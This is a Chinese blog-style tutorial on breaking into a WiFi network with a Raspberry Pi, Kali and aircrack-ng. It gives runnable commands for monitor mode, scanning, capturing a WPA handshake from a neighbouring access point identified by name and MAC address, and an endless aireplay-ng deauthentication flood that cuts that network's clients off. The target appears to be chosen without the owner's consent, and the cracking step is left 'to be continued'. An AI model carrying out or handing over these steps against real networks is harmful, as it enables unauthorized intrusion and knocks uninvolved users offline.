记一次实战,暴力破解WIFI
工具清单
- 树莓派3B+
- Kali 2021
- 免驱无线网卡
检查设备
使用iwconfig
查看是否识别到免驱无线网卡,如图,出现了wlan0的无线设备,即为识别成功
实施步骤
查看周边无线网络
使用airodump-ng wlan0
命令,进行无线网络扫描。
一般情况会遇见ioctl(SIOCSIWMODE) failed: Device or resource busy
报错,遇到此情况,只需先卸载设备,设置设备成monitor模式,重新启用即可解决。命令如何下:
ifconfig wlan0 down
iwconfig wlan0 mode monitor
ifconfig wlan0 up
再次运行airodump-ng wlan0
命令,扫描周边无线网络。
详细描述:
BSSID
–无线AP(路由器)的MAC地址,如果你想PJ哪个路由器的密码就把这个信息记下来备用。
PWR
–这个值的大小反应信号的强弱,越大越好。很重要!!!
RXQ
–丢包率,越小越好,此值对PJ密码影响不大,不必过于关注。
Beacons
–准确的含义忘记了,大致就是反应客户端和AP的数据交换情况,通常此值不断变化。
#Data
–这个值非常重要,直接影响到密码PJ的时间长短,如果有用户正在下载文件或看电影等大量数据传输的话,此值增长较快。
CH
–工作频道。
MB
–连接速度。
ENC
–编码方式。通常有WEP、WPA、TKIP等方式,本文所介绍的方法在WEP下测试100%成功,其余方式本人 并未验证。
CIPHER
-检测到的加密算法。
AUTH
-使用的认证协议。MGT(WPA/WPA2使用独立的认证服务器,平时我们常说的802.1x,radius,eap等)
SKA(WEP的共享密钥)
PSK(WPA/WPA2的预共享密钥)
OPN(WEP开放式)
ESSID
–可以简单的理解为局域网的名称,就是通常我们在搜索无线网络时看到的列表里面的各个网络的名称。
这里我们可以看到很多无线网络,选择一个#Data变化较大的幸运儿,这里就选择ESSID为cao415
的AP端。
抓取握手包
使用如下命令进行抓取握手包。
airodump-ng -w cao415 -c 6 --bssid 50:64:2B:62:EF:82 wlan0
格式:
airodump-ng -w 保存的文件名 -c 频道号 --bssid AP的MAC地址 攻击无线网卡号
如图,我们可以看到,第1行为AP的信息,第2至5行为AP下所连接的客户机。
详细描述:
BSSID
-AP的MAC地址。
STATION
-客户机的MAC地址。
PWR
-信号的强弱。
Rate
Lost
-丢包数
Frames
Notes
Probes
-被客户端查探的ESSID。
发送攻击包
使用
aireplay-ng -0 0 -a C8:3A:35:5E:93:C0 -c 12:4A:14:AA:23:B4 wlan0
命令进行攻击
针对5Ghz网络需要使用-D参数
aireplay-ng -0 0 -a C8:3A:35:5E:93:C0 -c 12:4A:14:AA:23:B4 -D wlan0
格式:
aireplay-ng -0 发包次数 -a AP的MAC地址 -c AP下一客户端的MAC地址 攻击无线网卡号
详情描述:
-0为模式中的一种:冲突攻击模式,后面跟发送次数(设置为0,则为循环攻击,不停的断开连接,客户端无法正常上网,-a 指定无线AP的mac地址,即为该无线网的bssid值,上图可以一目了然。
观察、监听 抓取握手包 界面,是否有WPA handshake出现,如下图,若有,即可Ctrl-C停止抓包。
爆破握手包
待续